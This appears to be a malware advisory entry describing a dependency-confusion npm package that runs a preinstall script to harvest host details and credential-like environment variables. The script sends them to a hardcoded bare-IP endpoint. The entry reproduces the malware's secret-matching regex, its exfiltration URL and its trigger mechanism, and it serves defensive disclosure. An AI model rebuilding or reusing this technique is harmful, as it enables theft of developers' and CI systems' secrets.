MAL-2026-5801

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (75aea05ceba339fbc9f0764e178d0cac8170219115218d635b14639ec01410a4) package.json declares `preinstall: node index.js`, which fires automatically on `npm install`. index.js collects host identifiers (os.hostname(), os.userInfo().username, cwd) and enumerates process.env, filtering keys by the regex /key|seed|secret|token|private|mnemonic|password|blockfrost|redis|telegram|batcher/i to capture credential-shaped values (API keys, seed phrases, mnemonics, private keys, Telegram bot tokens, Blockfrost keys, Redis URLs, batcher keys). The harvested JSON is POSTed to https://2.25.140.71:8443/surflending/npm-confusion — a hardcoded bare-IP endpoint. The attacker-chosen URL path `/surflending/npm-confusion` and the sentinel version 9.9.9 indicate a dependency-confusion attack targeting a private `bodega-sdk` package (likely SurfLending/Bodega DEX on Cardano): any organization with an internal package of this name risks the public copy resolving on install, leaking credentials from CI runners and developer machines unconditionally.